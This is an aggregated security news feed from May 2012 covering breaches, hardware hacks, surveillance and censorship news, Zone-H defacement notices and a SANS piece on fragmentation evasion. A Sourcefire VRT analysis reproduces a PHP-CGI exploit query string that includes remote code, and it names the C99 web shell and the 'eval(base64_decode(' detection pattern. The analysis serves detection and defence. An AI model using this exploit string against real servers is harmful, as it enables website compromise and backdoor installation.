Planet Security

May 24, 2012

The Register - Security Pipex 'silence' condemned punters' emails to spam blackhole

ISP blocked for a week after 'ignoring' complaints

Analysis  Pipex subscribers struggled to send emails for several days after antivirus biz Trend Micro declared the ISP's network a source of spam.…

hackadayPutting Linux on the Vtech InnoTab

The Vtech InnoTab is a child-sized tablet computer built for kids. Apart from being the ideal solution to keeping the grubby, sticky hands of nieces and nephews away from proper ‘adult sized’ tablets, it can also serve as a Linux tablet perfect for a few homebrew apps. [Mick] picked up an InnoTab for his son, but after getting BusyBox working, we’re thinking it has become a toy for the father and not the son.

[Mick] cracked open the InnoTab and soldered a few wires to a pair of pins that connect to a TTL level converter and then to a TV. There’s a full Linux shell running on [Mick]‘s new tablet, encouragement enough for him to start porting  ScummVM, the engine behind famous LucasArts point-and-click adventure games of the early 90s.

Right now, it’s still very much a work in progress, but [Mick] has full screen support and a virtual keyboard working; more than enough to enjoy Day of the Tentacle and Sam & Max Hit the RoadAfter the break you can see the video of [Mick]‘s InnoTab running the much more child-friendly SCUMM adventure Putt Putt Goes to the Moon, something we’re sure his son will love.


Filed under: toy hacks


Zone-Hhttp://www.englisharticlewriters.com/wp-content/themes/MyProduct/page-blog.php

http://www.englisharticlewriters.com/wp-content/themes/MyProduct/page-blog.php notified by ghost-dz

Zone-Hhttp://radhikaclasses.com/Dz.html

http://radhikaclasses.com/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://perafin.com/Dz.html

http://perafin.com/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://kotacoachings.com/Dz.html

http://kotacoachings.com/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://johnpeter.in/Dz.html

http://johnpeter.in/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://florafittings.com/Dz.html

http://florafittings.com/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://cypresstechnosolutions.com/Dz.html

http://cypresstechnosolutions.com/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://bietjhs.ac.in/Dz.html

http://bietjhs.ac.in/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://acebrassworld.com/Dz.html

http://acebrassworld.com/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://schoolkid.in/Dz.html

http://schoolkid.in/Dz.html notified by FL1T0X_Dz

Zone-Hhttp://www.jukzshoes.com

http://www.jukzshoes.com notified by h3llboy

Zone-Hhttp://uswordpresspros.com

http://uswordpresspros.com notified by h3llboy

Zone-Hhttp://txwebsolutions.com

http://txwebsolutions.com notified by h3llboy

Zone-Hhttp://sinkscanyonstatepark.org

http://sinkscanyonstatepark.org notified by h3llboy

Zone-Hhttp://nailsinvestments.com

http://nailsinvestments.com notified by h3llboy

Zone-Hhttp://jgmacro.com

http://jgmacro.com notified by h3llboy

Zone-Hhttp://genpow.com

http://genpow.com notified by h3llboy

Zone-Hhttp://generalpowerandlight.com

http://generalpowerandlight.com notified by h3llboy

Zone-Hhttp://deberrycustomhomesdfw.com

http://deberrycustomhomesdfw.com notified by h3llboy

Zone-Hhttp://thecupcakerycorp.com/index.php

http://thecupcakerycorp.com/index.php notified by h3llboy

Schneier on SecurityThe Banality of Surveillance Photos

Interesting essay on a trove on surveillance photos from Cold War-era Prague.

Cops, even secret cops, are for the most part ordinary people. Working stiffs concerned with holding down jobs and earning a living. Even those who thought it was important to find enemies recognized the absurdity of their task.

I take photos all the time and these empty blurry frames tell me that they were made intentionally. Shot out of boredom, as little acts of defiance, the secret police wandered the streets of Prague for twenty years taking lousy pictures of people from far away because a job is a job.

Occasionally something interesting happened, like spotting a hot stylish, American made Ford Mustang Sally. However, it must have been an awful job, with dull days that turned into months and years, of killing time between lunch and dinner.

The Register - Security Attack of the clones: Researcher pwns SecureID token system

But RSA claims it would only work on rootkit-compromised gear

Analysis  RSA Security has downplayed the significance of an attack that offers a potential way to clone its SecurID software tokens.…

DigitalBondIntel, VxWorks, McAfee, NitroSecurity Strategy

SCADA Security ProductsWhen Intel followed the acquisition of Wind River, the maker of the popular PLC OS VxWorks, with the acquisition of McAfee, our curiosity was peaked. More recently they acquired SIEM vendor NitroSecurity who had a significant and sustained effort on ICS security. So we have been waiting to see what solutions would result from that interesting combination.

On May 15th McAfee had a marketing splash, McAfee Aims To Protect Critical Infrastructure From Increased Attacks.

McAfee and Intel created a “reference implementation” that integrates a number of McAfee security solutions relevant to substations and network operations centers with selected Intel processors and hardware-based security and manageability technologies. The reference implementation emulates the components and functionality commonly found in a critical infrastructure environment. The added capability of end-point security, network security and security management solutions can deliver a secure environment with increased reliability.

There is a link to a Protect Critical Infrastructure page and a solution guide. So far the information has been vague and underwhelming. It talks in general terms about needing multiple product solutions that McAfee offers that are managed across numerous zones. The best and most specific information was:

For example, the McAfee DAM solution provides application programming interface (API) integration with the OSIsoft PI System and pulls asset information tags into the McAfee SIEM solution for more accurate correlation and analysis. Dynamic whitelisting helps prevent any unauthorized code or malware from operating on fixed function devices and is ideal for SCADA and ICS systems that perform a finite set of operations. The McAfee IPS solution also features one of the broadest sets of ICS and SCADA-specific attack signature sets. Key McAfee solutions with native SCADA and ICS support include dynamic whitelisting, SIEM, DAM, and IPS.

More like the PI example and more detail would be very useful. Hopefully it will follow shortly as they integrate NitroSecurity more fully.

One controversial area is the focus of integrating security across zones:

McAfee empowers organizations to address security and regulatory mandates while maintaining availability across IT, SCADA, and ICS. The Security Connected strategy breaks down the silos that segregate these zones from a protection, detection, and incident response perspective and allows for a much more robust security posture.

There are benefits to this approach, but also risk allowing more traffic from the less secure zone into the more secure zone. It would be one thing to push security events from the SCADA or DCS to the SIEM in the enterprise, but as I read the document McAfee envisions much more where security updates are pushed into the more secure zone and security products potentially managed from the least secure zone.

I can’t end this article without a brief mention of PLC security. Since VxWorks is the OS in many PLC’s, it would be great if they worked with PLC vendors to provide them the security hooks that would make providing basic PLC security functions easier.

hackadayBuilding an x-ray machine and letting everything go to your head

It’s not every day one of the builds on Hackaday gets picked up by a big-name publication, and it’s even rarer to see a Hackaday contributor grace the pages of an actual print magazine. Such is the case with [Adam Munich] and his home-built x-ray machine.

We first saw [Adam]‘s x-ray machine at the beginning of this year as an entry for the Buildlounge/Full Spectrum laser cutter contest. [Adam] won the contest, landed himself a new laser cutter, and started writing for Hackaday. Now that [Adam] is gracing the pages of Popular Science, we’re reminded of the story of Icarus, flying too close to the sun.

[Adam]‘s x-ray machine is built around a Coolidge tube, the same type of vacuum tube found in dental x-ray machines. The device is housed in two suitcases – one used as a control panel and graced with beautiful dials and Nixies, the other housing the Coolidge tube and power supply. Proper x-ray images can be taken by pointing a camera at the scintillation screen, allowing [Adam] to see inside hard drives and other inanimate objects.

Sure, it’s a build we’ve seen before but it’s still very cool to see one of Hackaday’s own get some big name recognition.


Filed under: Medical hacks, news


InforworldIt's time to run .Net out of town

it's time to run .Net out of town

I don't know what it is about Microsoft and .Net Framework patches, but it seems that every time we have a sizable .Net patch, it doesn't work on enormous numbers of PCs

InforworldCould the .secure domain make the Internet safer?

Could the .secure domain make the Internet safer?

Most calls for new TLD (top-level domain) names seem like little more than real estate developers proposing the creation of entire new continents just to lease the land.

Inforworld10 hacks that made headlines

In our first Rogues Gallery, we looked at 10 infamous social engineers -- con men who exploited human weaknesses rather than technical vulnerabilities.

Heise SecurityYahoo released private certificate with new extension

Yahoo's launch of Axis, a new browser and extensions for desktop browsers, was marred when a blogger found that Yahoo had included its private certificate, used for signing the Chrome version of the extension, in the extension


Heise SecurityGoogle releases security update for Chrome 19

Google has patched several security holes in its Chrome browser. The update brings the browser's version up to 19.0.1084.52 and fixes two critical vulnerabilities, one of which was discovered by an external researcher


The Register - Security Yahoo! leaks! private! key! in! Axis! Chrome! debut!

Extension launch scuppered by certificate blunder

Yahoo! today released its Axis extension for Chrome – and accidentally leaked its private security key that could allow anyone to create malicious plugins masquerading as official Yahoo! software.…

SANS Information Security Reading RoomEvil Though the Lens of Web Logs

Category: Logging Technology and Techniques

Paper Added: May 23, 2012

ImperViewsGuide to Getting Cyberinsurance

A few months ago, we wrote about cyber insurance in two blog entires. Here's an excellent article explaining how to select a policy. Though this piece addresses the issue from a healthcare perspective, its lessons apply to many verticals.

CNET News.com - SecurityYahoo fumbles security in Axis browser launch

Troubled Internet pioneer forgets to publish terms of service for its new browser and then leaves in an apparent vulnerability.

Internet Security and ProgrammingAttack of the clones: Researcher pwns SecureID token system

But RSA claims it would only work on rootkit-compromised gear Analysis RSA Security has downplayed the significance of an attack that offers a potential way to clone its SecurID software tokens.… Read more…

Window SecurityPanda Cloud Office Protection - Voted WindowSecurity.com Readers' Choice Award Winner - Endpoint Security

Panda Cloud Office Protection was selected the winner in the Endpoint Security category of the WindowSecurity.com Readers' Choice Awards. AccessPatrol and Netwrix USB Blocker were runner-up and second runner-up respectively.

Internet Security and ProgrammingYahoo! leaks! private! key! in! Axis! Chrome! debut!

Extension launch scuppered by certificate blunder Yahoo! today released its Axis extension for Chrome – and accidentally leaked its private security key that could allow anyone to create malicious plugins masquerading as official Yahoo! software.… Read more…

ItoolBox Networking and InfrastructureAPAR Friday: MAXPARTITONS issue revisited; It's been resolved

(Posted May 24, 2012) Back on January 26, 2012 I published a blog entry titled “Be careful how you define your partition-by-growth universal table space”.  It discussed how once you set the MAXPARTITIONS value for a partition-by-growth universal table space, you coul...

SANS Internet Storm CenterISC StormCast for Thursday, May 24th 2012 http://isc.sans.edu/podcastdetail.html?id=2557, (Thu, May 24th)

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

CNET News.com - SecurityNotorious Bredolab virus creator is sentenced to prison

Credited with infecting 30 million computers around the world, Georgy Avanesov is sentenced to four years in prison in Armenia.

May 23, 2012

The Register - Security BigPond GameArena hacked, 35,000 passwords reset

Quick disclosure from Telstra

Telstra has taken the unusual – in Australia – step of proactively announcing that a service has been compromised.…

hackadayRobotic falconry: winged unit lands on you!

It doesn’t have four rotors, but this advanced-glider is every bit as impressive as the most complicated of quadrotor offerings. It’s the first glider that can successfully perch on your arm. We can’t help but think back to the owl in the original Clash of the Titans movie.

The team at the Aerospace Robotics and Control Lab of the University of Illinois at Urbana-Champaign is happy to show off the test flights they’ve been conducting. We’ve embedded two of them after the break which show the unit landing on this person’s arm, and on the seat of a chair. The image above shows a montage of several frames from the flight, and gives us a pretty good look at the articulated wings. You can seen them both bent in the middle of the flight to zero in on the landing zone. In addition to this there are flaps on the trailing edge of the wings and tail. The flight path is a bit wandering since the glider has no vertical tail to stabilize it.

Now if they can make it harvest power from overhead electrical lines they’ve got a spy-bird which can be dropped from a plane (or from a drone).

[via Technabob]


Filed under: robots hacks


hackadayAPC Android computer isn’t a Raspberry Pi

VIA Technologies, ostensibly in an attempt to compete with the Raspberry Pi (if you can believe all those bloggers out there), is releasing a tiny single board computer called the APC Android PC. The VIA website for the APC is down, so just search Google News for all the details.

The specs are somewhat similar to the Raspberry Pi – HDMI out, Ethernet, SD card, and a few USB ports – but that’s about where the similarities end. The APC runs a version of Android 2.3 customized for mouse and keyboard input where the RasPi runs Linux. The APC can only display 720p video (compared to the RasPi’s 1080p), and doesn’t have GPIO pins that can be used with Arduino shields.

We’re pretty sure VIA is going after the media center PC market here with a low-power board that can easily stream movies or a season of TV shows over a network. At $50, we’re sure the APC will find a home in a few homebrew devices, MAME machines, and carputers.

If anything, this only portends a whole bunch of single-board ARM/Linux computers riding on the coat tails of the RasPi. That’s awesome no matter how you look at it.

If a $50 Android board doesn’t whet your whistle, VIA also released a Mini-ITX board with 12 hardware serial ports. Hardware serial ports are getting rare nowadays despite how useful they are for embedded applications. 12 (with riser cards, natch) serial ports seems overkill, but we’re sure some Hackaday reader has been looking for this board for a while now.


Filed under: android hacks, hardware


VRT SOurcefirePHP-CGI Leads To C99 Shell

While reviewing the events on one of the network the VRT monitors, we decided to do some digging on an event triggered by scan for the recently released PHP-CGI vulnerability. Knowing what attackers were actually trying to drop onto vulnerable systems would be itneresting, we figured. Since we could ensure proper coverage at that stage of the attack as well if we found something novel, we decided to go take a look.

The URL of the scan was:

/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F%2Finfo3.txt

Nothing particularly surprising there. What was interesting, through, was the "info3.txt" file, which contained only:

< ? php
      echo("830ad4ea3b311795d5a615b9e5fdbb9a");
? >
Confused as to how that would help an attacker, we did the logical thing and looked for "info2.txt". Not only did it exist, it had a much more interesting bit of code:


(Full copy of info2.txt)

Even without reading the Russian, it's pretty obvious what's going on here; the "c99.php" gives it away as the C99 Shell, a common backdoor tool used for easy control via a web interface once a box has been popped. Doing a quick bit of Google Translate, the comments are simple notes around file creation. The only part that doesn't make sense is the exploit writer's proud declaration of his own masculinity - but then again, it's not like we need to be this guy's psychiatrist in order to block him.

So the question from there is - how do we block this? Going after the actual encoded data is the simplest and most reliable way, so we decoded the rather large chunk of Base64 data to see what we were looking at. The data that popped out began with:

/*
Encoder : AROHA PHPencoder ver. 1.04
WEB : 
http://phpencoder.aroha.sk/
*/
?>
//add php tags before usage
/*
******************************************************************************************************
*
*                                       c99shell.php v.1.0 beta (?? 21.05.2005)



The "c99shell.php v" bit is the obvious target there, as it's least likely to change; SID 23016 looks for the encoded version of that string.

While detecting the specific attack is one thing, looking for generic obfuscations or other indicators common to many exploits is another.  It can sometimes lead to detecting unknown or little known attacks, since they might have an exploit you don't know about but reuse the same technique as an attack you do know about.

That in mind, we realized that we should have a rule that looks for "eval(base64_decode(", which was at the very bottom of the script, as well - not only has SID 15363, which looks for eval/unescape in JavaScript, found a ton of malicious activity in the wild, a quick bit of searching for "eval(base64_decode(" shows pages and pages of hits on hacked web sites, and nothing at all on legitimate use. SID 23018 now looks for that bit of nasty.

Just to round things off, we've also included SID 23017 for the big, bold "I'm a man!" string. Much like SIDs 21548, 21539, 21549, 21876, and 22039 - which all look for variants on Blackhole and Cutwail's classic "Loading ... please wait", this should never show up in legitimate traffic, and may catch different tools associated with this particular group.

In the meantime, we've been able to confirm that our existing rules for the use of an installed C99 shell work well; we suggest that customers concerned about this sort of traffic consider enabling SIDs 16613 - 16628, 18686 - 18690, and 22917 - 22936. We'd love to hear your feedback on the rules, so don't be shy about dropping us a note if you see anything around them.

hackadayHackerspace Intros: Squidfoo in Springfield, Missouri

I am particularly pleased to be announcing SquidFoo, an Art gallery/studio and hackerspace in Springfield Missouri (hackerspaces.org link). For those unaware, this small town is where I’m located (Brad Pitt came from here too!). I would love to take credit for this hackerspace, but I can’t. [Scott Sauer] and [Phil Broussard] created it and reached out to me when they heard I was in town. I’m going to make up for coming late to the party by helping them get organized, and possibly planning some events. You’ll be seeing more of SquidFoo here because this is probably where I’ll be doing future Hackaday projects for a while!

The space is divided into 4 physical areas. There’s the art gallery, the art studio/lounge, the hackerspace or “collaboratory”, and the chopshop. Right now, as you can see in the pictures, there’s quite a mess in the hackerspace and shop area. They just finished cleaning out a rather large basement  ”the fallout shelter” to put all this stuff in, so the workstations should be much more usable in the immediate future. Right now, there are areas for painting, sewing, electronics stations, a 3d printer, the full shop. Some plans for the immediate future include adding an RFID system, automating our lighting, an amateur radio studio, alternative media studio, and there’s a nearly finished RepRap Mendel.

If you’re in the area, please stop by sometime and check it out. As I said, they’re just getting things going so there are only a handful of members. Those few members are kicking some butt though. I ran into [Ryan], aka [Platinumfungi] while he was working on a Metroid helmet prop for an upcoming video. He explains a bit about how it was made in this short clip. You might have heard of him before, he does custom modded classic gaming systems. I know I had seen his Zelda themed NES before.

Remember to send us your hackerspace intro. We don’t care how big or how small you are, Hackaday wants to get the word out to help you grow!


Filed under: Hackerspaces


Internet Security and ProgrammingOn gay marriage, Obama’s critics and supporters alike think he may shift again

Supporters and critics of President Obama’s endorsement of same-sex marriage agree on one thing: He may not be finished evolving on the subject. Despite his comments that he thinks the matter should be left to the states, many gay rights advocates strongly believe that it must be dealt with nationally — and that Obama is [...]

hackadayLaptop touchpad as a standalone peripheral

[Viktor] is working on salvaging parts from a dead laptop. In his eyes the biggest gem to be had is the touchpad, so he set out to see if he could make the touchpad a standalone device. You might be envisioning the many hells of interfacing this with a microcontroller and writing firmware to measure and translate the input to HID compatible commands. The good news is it’s quite a bit simpler than that, with just one gotcha.

He looked around to see what he could find about the chip that drives the touchpad. He couldn’t locate an exact match, but a datasheet from a similar family of controllers make him think that there should be a PS/2 data and clock output from the chip. After probing the test points on the board he found them, as well as the voltage and ground rails. Above you can see he soldered an old mouse cable to the board and it works when plugged in.

But we did mention the gotcha. There doesn’t seem to be any support for the right and left buttons. Those were housed on a flexible PCB which attached to the white connector seen above. That PCB also connected to the computer so we don’t know if they will work with this hack or not.


Filed under: peripherals hacks


SANS Internet Storm CenterIP Fragmentation Attacks, (Wed, May 23rd)

Using overlapping IP fragmentation to avoid detection by an IDS has been around for a long time. We know how to solve this problem. The best option in my opinion is to use a tool such as OpenBSD's pf packet filter [1] to scrub our packets eliminating all the fragments (pfSense [2] makes this easy to deploy). However, this option is not without its caveats [3]. You could simply configure your IDS to alert for and/or drop any overlapping fragmented packets. Overlapping fragments should not exist in normal traffic. Another option is to configure the IDS to reassemble the packets the same way the endpoint reassembles them. Snort's frag3 preprocessor will reassemble the packets based on the OS of the target IP and successfully detect any fragmented attacks that would work against a given target host. Problem solved right? There is another opportunity for attackers to use differences in the fragmentation reassembly engines to his advantage. What happens when the IDS analyst turns to their full packet capture to understand the attack? If the analyst's tools reassemble the packets differently than the target OS the analyst may incorrectly dismiss the TRUE positive as a FALSE positive.

Today, with the low cost of disk drives, more and more organizations can afford to maintain full packet captures of everything that goes in and out of their network. If you are not running full packet capture, you really should look into it. I don't think there is a better way to understand attacks on your network then having full packet captures. One great option is to install Daemonlogger [4] on the Linux/BSD distribution of your choice. This was an option I used for many years. Today, I use the Security Onion distro [5] by Doug Burks. If you want a free IDS with full packet capture that you can quickly and easily deploy, Security Onion is a great option.
Once you have the full packet capture, how do you find the fragmented attacks? You could try reassembling them with Wireshark. Let's check that out and see what happens. Security Onion has scapy installed so let's use that to generate some overlapping fragments. I'll generate the classic overlapped fragment pattern illustrated by the paper Active Mapping: Resisting NIDS Evasion Without Altering Traffic by Umesh Shankar and Vern Paxson [6] and then further explained in Target Based Fragmentation Assembly by Judy Novak [7].

Now open up our fragmentpattern.pcapwith Wireshark and see what we see.



If you compare the reassembled pattern to what was outlined in Judy Novak's paper you will recognize the BSD reassembly pattern. So you will see all the attack packets that are targeted at a host using the BSD reassembly methodology, but not ones targeted at other reassembly policies (First, Last, BSD-Right andLinux). You would not see overlapping fragmentation attacks targeted at both Windows and Linux. However, Security Onion now (as of build 20120518 [8] ) has a Python script called reassembler.py. If you provide reassembler.py with a pcap that contains fragments, it will reassemble the packets using each of the 5 reassembly engines and show you the result. It will even write the 5 versions of the packets to disk so you can examine binary payloads as the target OS would see them. Let's see what reassembler does with the fragmented packets we just created.

Now you can see exactly what the IDSsaw and make the correct decision when analyzing your packet captures. If using the Onion isn't an option for you, you can download reassembler.py direct from my SVN http://baggett-scripts.googlecode.com/svn/trunk/reassembler/. How do you handle this? What are some other ways to solve this problem? Leave a comment.


Security Onion creator Doug Burks and I are teaching together in Augusta GA June 11th - 16th. Come take SEC503 Intrusion Detection In-Depth from Doug or SEC560 Network Penetration Testing and Ethical Hacking from me BOOTCAMP style! Sign up today! [9]
Mark Baggett
@MarkBaggett
http://www.indepthdefense.com
[1] http://www.freebsd.org/doc/handbook/firewalls-pf.html

[2] http://www.pfsense.org/

[3] http://sysadminadventures.wordpress.com/2010/11/02/why-pfsense-is-not-production-ready/

[4] http://www.snort.org/snort-downloads/additional-downloads

[5] http://securityonion.blogspot.com/

[6] http://www.icir.org/vern/papers/activemap-oak03.pdf

[7] http://www.snort.org/assets/165/target_based_frag.pdf

[8] http://securityonion.blogspot.com/2012/05/security-onion-20120518-now-available.html

[9] http://www.sans.org/community/event/sec560-augusta-jun-2012

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Internet Security and ProgrammingNuclear weapons just don’t make sense

Nuclear weapons are terror weapons, and basically unusable. That’s one reason why no rational strategy, other than deterrence, has ever been developed to justify them. Events in the past 10 days make my case. Read full article >> Read more…

EFF deeplinksThis Week In Transparency: Patriot Act, 50 Year Old Secrets, and More Drones

CIA Still Claims Its Drone Program is "Secret"

Last week, the Wall Street Journal reported the Obama Administration may finally lift the legal veil of secrecy surrounding the CIA’s covert drone program. The ACLU has been involved in a lawsuit over the US government’s constitutional authority to target American citizens with strikes overseas with its supposedly covert CIA drone program. On Monday, however, the CIA decided to continue to claim the program is a state secret and that they should not have to admit or deny it exists.

This, despite the fact that, as Journal reported, “U.S. drone strikes are hardly a secret. Officials have spoken openly about them, even discussing the operations in formal speeches. But they are still classified, and unauthorized disclosures about details of individual missions could constitute a felony.”

Ironically, on the same day, the White House announced a new policy for which suspects get targeted by the covert program, saying counterterrorism chief John Brennan would have the final say on who gets targeted by The Program Which Must Not Be Named.

EFF Releases New FOIA Documents and Files Amicus Brief in Transparency Case

  • Patriot Act

EFF published the full set of documents the Justice Department has handed over so far in our FOIA lawsuit for the Justice Department’s secret interpretation of section 215 of the Patriot Act, of which Senators Ron Wyden and Tom Udall warned “most Americans would be stunned to learn the details of how these secret court opinions have interpreted section 215 of the Patriot Act.”

Meanwhile, a court in New York ruled against New York Times reporter Charlie Savage, along with the ACLU, in their separate lawsuit asking for the Justice Department’s secret memo on the same matter. Both EFF and ACLU have separate suits pending related to Section 215 in different jurisdictions.

  • State Department documents on ACTA

The EFF also received a response from the State Department last week in response to our FOIA request for documents related to the Anti-Counterfeiting Trade Agreement (ACTA). ACTA contains harsh copyright standards that EFF has been protesting for years. The documents suggested that ACTA was not submitted to the normal State Department review process to determine its constitutionality before it was signed by the Deputy Trade Ambassador. Read more about the FOIA request and how law professors cast further doubt on ACTA’s constitutionality here.

  • FOIA Suit for White House Visitor Records

EFF, along with Citizens for Responsibility and Ethics in Washington (CREW) and a host of other civil society organizations, recently filed an amicus brief in the long running Freedom of Information Act case against Department of Homeland Security (DHS) and the Secret Service for access to the White House visitor logs. Previously, the Obama administration released many of the logs, but is still arguing in court that they are not subject to FOIA because they do not belong to a specific agency. However, given it’s clear Secret Service is part of DHS, there is no threat to public safety, and the White House has released many records already, that there is no reason they should be withheld from the FOIA process.

NSA Forced to Declassify Document It Accidentally Posted Online

In an embarrassing incident two weeks ago, the National Security Agency (NSA)—notorious for overclassification and secrecy—was forced to use a “rarely used authority” to declassify a “properly classified” document in full after they mistakenly posted it on their website, according to secrecy expert Steven Aftergood. Instead of redacting the alleged sensitive material in the online post, they highlighted it.

But, according to Aftergood, as is the case in many circumstances of government classification, it is hard to see why it wasn’t declassified in the first place:

There was nothing exceptional about the contents of the document, and there was no overriding public interest that would have compelled its disclosure if it had been properly classified.  Nor is any national security damage likely to follow its release.

Final Volume of the CIA’s Bay of Pigs Study Will Remain Classified

Two weeks ago, a federal judge ruled for the government in a FOIA suit filed by the National Security Archives asking the CIA to formally declassify a draft of the last volume of a history of the Bay of Pigs Invasion. Unfortunately, the federal judge ruled the government could keep the draft version classified, despite the fact that it was written 31 years ago about an event that happened more than 50 years ago.

The judge reasoned that the final volume was a draft not intended “for inclusion in the final publication” and therefore the ‘deliberative process’ exemption to FOIA applied, which provides an exemption to disclosure for documents that help government officials arrive at final agency policy positions. As McClatchy reported, “The judge agreed with the CIA assertion that release of Volume V would have a chilling effect on current CIA historians who might be reluctant to try out ‘innovative, unorthodox or unpopular interpretations in a draft manuscript’ if they thought it would be made public.”

The deliberative process privilege – when narrowly invoked – serves legitimate purposes. It is designed to provide lower level government employees with the freedom to express ideas, without fear of public disclosure if those ideas are not ultimately adopted by the agency. However, in this case, the (former) government employee who wrote the draft volume sought its release – through a FOIA request – 10 years ago. At the time, the information contained within the draft was still classified, so his request was denied. Now, however, the information is no longer classified, and, given that the person whose “deliberative process” the CIA is allegedly protecting sought the draft’s release, it is hard to understand what the public interest in protecting the document, 30 years after its creation, could possibly be.

Related Issues: 

The Register - Security Armenia jails Bredolab botmaster for 4 years

First computer crime conviction in the former Soviet republic

A cybercrook who established a 30 million computer strong botnet has been jailed for four years in Armenia.…

hackadayYour face in chocolate

We think in might be absurdly vain, but wouldn’t it be fun to give everyone in your family a chocolate modeled after your mug this holiday season? [Eok.gnah] has already worked out a system to make this possible. It consists of three parts: scanning your head and building a 3D model from it, using that model to print a mold, and molding the chocolate itself.

He used 123D to scan his face. No mention of hardware but this face scanning rig would be perfect for it. He then cleaned up the input and used it to make a mold model by subtracting his face from a cube in OpenSCAD. That needs to be sliced into layers for the 3D printer, and he used the Slic3r program which has been gaining popularity. Finally the mold was printed and the face was cast with molten chocolate. We’d suggest using a random orbital sander (without sand paper) to vibrate the bottom of the mold. This would have helped to evacuate the bubble that messed up his nose.

You know, it doesn’t have to be your face. It could be another body part, even an internal one… like your brain!


Filed under: cooking hacks


Think Security - Jeff Jones Security BlogCybersecurity Norms for a Secure Cyber-Future

I’m pleased today to introduce a guest blog post by Jan Neutze, a senior global security strategist on my team who focuses on cybersecurity norms and Internet governance. Jan is speaking today at the Atlantic Council of the United States and shares...(read more)

EFF deeplinksThis Week In Internet Censorship: Hackers DDOS Eurovision and Indian websites, France Calls Out Amesys, South Korean Podcasters Under Fire

Eurovision Song Contest Sets Stage for Online Protest

Last Thursday, Azeri hackers calling themselves Cyberwarriors for Freedom temporarily took down four different websites for the Eurovision Song Contest, which is being hosted by Azerbaijan this week. Hackers replaced the home pages with an Azeri-language message demanding that President Ilham Aliyev cancel the event. While they condemned the destruction of homes to make way for the Eurovision arena and the silencing of independent journalists, the hackers’ message also included homophobic language, calling the contest a “gay parade.”

While Azeri authorities continue to investigate the hacking, the International Partnership Group for Azerbaijan also launched a new campaign petitioning Eurovision performers to show support for human rights in Azerbaijan. The campaign echoes statements from Amnesty International and Human Rights Watch, who have called upon Azeri authorities to release detained opposition activists and guarantee free expression for peaceful protesters planning demonstrations before the contest.

The Azeri parliament is currently debating laws curtailing social media access, even though 78% of Azeris have never used the Internet and only 7% go online daily.

French Judicial Investigation Calls Out Amesys’ Complicity With Libyan Torture

The International Federation of Human Rights (FIDH) and the League of Human Rights (LDH) announced on Monday that Amesys, a subsidiary of the French defense firm Bull S.A., will be investigated for supplying the Gadhafi regime with electronic surveillance tools. Both NGOs have accused Amesys of complicity with the dictator’s crimes against humanity after NATO forces found equipment bearing the company logo in an abandoned security building in August 2011. FIDH and LDH originally filed their complaint against Amesys with a French civil party in October 2011.

A Wired report coinciding with the announcement of the French judicial investigation details Libyan Internet activism and government monitoring during the 2011 revolution. Amesys’ EAGLE Interception system was one of the many Western-built Internet surveillance systems that NATO found in the monitoring bunker. The EAGLE equipment suite can monitor Internet users beyond the scope of “lawful interception” wiretaps that require a warrant for a particular IP address. Instead, EAGLE uses “massive interception,” which can analyze all network communications and store them in a database that is searchable by keywords, dates, and user names or addresses.

If Amesys has to pay damages for working with Gadhafi during the revolutions, it will serve as a warning for Internet technology firms that sell to human rights abusers. Earlier this year, the United States Congress re-introduced the Global Online Freedom act, which seeks to restrict exports of surveillance or censorship technologies to Internet-restricting governments. While the bill is imperfect, its commitment to corporate accountability for human rights could inspire a set of legal best practices for multinational corporations that governments could use for future investigations of firms like Amesys.

Anonymous Hacks Indian Government Sites to Protest Blocking of Video-Sharing Services

The Indian Congress Committee and Supreme Court websites were both taken down by distributed denial-of-service attacks as part of Anonymous’ #OpIndia, which sought to chastise Indian Internet service providers for blocking video-sharing websites such as Vimeo. The ISPs acted in response to a state proposal for a UN Committee for Internet Related Policies (CIRP) that would give India’s ruling party discretion to censor all online content. This proposal comes in the wake of several movie piracy lawsuits that Indian and international media conglomerates have filed since February 2011.

These lawsuits have resulted in the issuance of court orders, known in India as “Ashok Kumar” orders, that ask all parties to halt the distribution, display, or download of particular movies. It is unclear why the ISPs chose to block entire websites, a move that removed access to considerable non-infringing content. Indian copyright law is similar to the American Digital Millennium Copyright Act in that intermediaries such as Vimeo and Dailymotion are actually protected from most copyright litigation. ISPs reported that they were following the temporary restraining order the Madras High Court recently published, which condemned “copying, recording, reproducing, camcording or communicating, or allowing others to communicate" the contents of the film 3 in any form.

Anonymous was not the only organization to protest the sloppy content-management of ISPs and Indian state lawyers. Sanjay Tandon, vice president of music and anti-piracy from Reliance Entertainment, stated, “Our requirement from ISPs has never been to block entire sites… ISPs just want to block the entire site because it’s less work than to identify content individually.”

South Korean Podcasters Accused of Breaking Election Law

Two hosts of the popular South Korean liberal podcast “Naneun Ggomsuda” (“I’m a Petty-Minded Creep”) have been summoned for questioning in regards to the Seoul Metropolitan Election Commission’s charges relating to the organization of eight large, public rallies showing support for the Democratic United Party. South Korea’s election laws prohibit any endorsement of candidates outside of a two to three-week official campaign period, but the rallies in question were held within ten days of the election. Typically, the government contacts the hosting providers of websites or media outlets found to have violated this rule before investigating citizen journalists, but the investigation of Kim Eo-Joon and Joo Jin-Woo began immediately following the election and has been ongoing for over a month.

South Korea has a rich history of arbitrarily censoring online free expression. In 2008, newly-elected conservative President Lee Myung-bak created the Korean Communication Standards Commission. This organization patrols the web for obscenity, national security threats, and defamation, and it has great latitude when defining standards for these offenses. Park Jeong Keun was slapped with a prison sentence last week for re-tweeting “self-evidently ludicrous missives” from North Korean regimes own Twitter account. After Park’s arrest earlier this year, Sam Zarifi, Asia-Pacific director of Amnesty International, said, "This is not a national security case; It's a sad case of the South Korean authorities' complete failure to understand sarcasm."

Internet Security and ProgrammingRob Portman said to be on short list for Romney vice president

